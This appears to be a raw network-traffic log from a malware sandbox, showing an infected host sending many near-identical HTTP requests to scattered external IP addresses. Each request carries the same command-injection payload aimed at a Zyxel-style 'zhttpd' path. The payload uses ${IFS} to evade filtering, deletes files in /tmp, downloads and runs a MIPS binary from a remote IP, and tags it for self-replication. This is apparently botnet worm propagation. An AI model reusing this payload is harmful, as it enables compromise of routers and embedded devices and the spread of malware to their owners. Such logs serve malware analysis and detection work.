                                          Jan 14, 2024 15:46:35.433859110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9056192.168.2.233675098.92.168.20443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.433901072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9057192.168.2.2357336124.177.186.125443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.433949947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9058192.168.2.234858436.247.192.17443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.433973074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9059192.168.2.235698819.246.202.147443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.434009075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9060192.168.2.23474208.127.149.25443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.434058905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9061192.168.2.234482469.215.45.141443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.434096098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9062192.168.2.2335560149.19.241.180443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.434144020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9063192.168.2.233824420.90.182.67443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.434191942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9064192.168.2.23387765.137.138.158443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.434206963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9065192.168.2.236037292.242.132.71443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.434278965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9066192.168.2.234203632.184.10.206443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.434339046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9067192.168.2.233788441.147.225.227443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.434386015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9068192.168.2.235264486.130.207.167443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.434437037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9069192.168.2.2346162203.19.69.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.434461117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9070192.168.2.233300025.103.179.144443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.434535027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9071192.168.2.2339858185.133.242.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.434595108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9072192.168.2.235924854.217.40.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.434617996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9073192.168.2.233293869.177.213.78443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.434667110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9074192.168.2.235483062.5.95.68443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.434686899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9075192.168.2.235460214.175.24.58443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.434711933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9076192.168.2.2350254156.117.67.94443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.434761047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9077192.168.2.2340766169.89.72.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.434807062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9078192.168.2.2360576163.180.124.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.434860945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9079192.168.2.234124861.43.30.129443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.434933901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9080192.168.2.234048264.126.20.239443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.434976101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9081192.168.2.2338352160.151.6.35443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.434999943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9082192.168.2.234287439.214.96.109443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.435045958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9083192.168.2.234219676.13.122.37443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.435107946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9084192.168.2.2342688146.237.40.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.435168982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9085192.168.2.2349576208.64.161.75443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.435199976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9086192.168.2.233387852.167.9.241443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.435230017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9087192.168.2.234182814.36.101.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.435282946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9088192.168.2.23450048.56.148.164443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.435317993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9089192.168.2.234660250.236.86.214443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.435353994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9090192.168.2.2358760162.110.166.11443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.435403109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9091192.168.2.2346314219.179.161.21443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.435457945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9092192.168.2.2343868163.196.17.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.435503960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9093192.168.2.2351008199.96.186.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.435524940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9094192.168.2.2344408201.235.251.47443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.435585976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9095192.168.2.2351322118.250.12.245443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.435621977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9096192.168.2.2339684134.79.122.179443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.435678005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9097192.168.2.233786868.142.177.235443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.435708046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9098192.168.2.2357496220.252.255.81443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.435762882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9099192.168.2.2357706126.183.149.169443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.435813904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9100192.168.2.233353653.30.87.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.435885906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9101192.168.2.233748053.38.196.161443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.435944080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9102192.168.2.2340508121.168.150.85443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.435961962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9103192.168.2.2340952139.19.12.118443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.436027050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9104192.168.2.234972862.156.8.123443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.436089039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9105192.168.2.2333836171.47.109.166443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.436157942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9106192.168.2.2355356208.113.38.235443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.436220884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9107192.168.2.2336518202.161.238.203443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.436244965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9108192.168.2.2355048131.124.77.64443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.436315060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9109192.168.2.235688063.63.156.116443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.436351061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9110192.168.2.233913492.106.231.46443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.436407089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9111192.168.2.235378291.124.180.96443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.436471939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9112192.168.2.2360736139.4.97.93443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.436527014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9113192.168.2.2335792149.48.99.77443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.436578989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9114192.168.2.235100663.104.97.89443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.436629057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9115192.168.2.2346238105.188.244.178443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.436670065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9116192.168.2.2351050135.49.152.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.436745882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9117192.168.2.2347960170.227.99.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:35.436794043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          9118192.168.2.2349168118.108.38.59443
                                          TimestampBytes transferredDirectionData
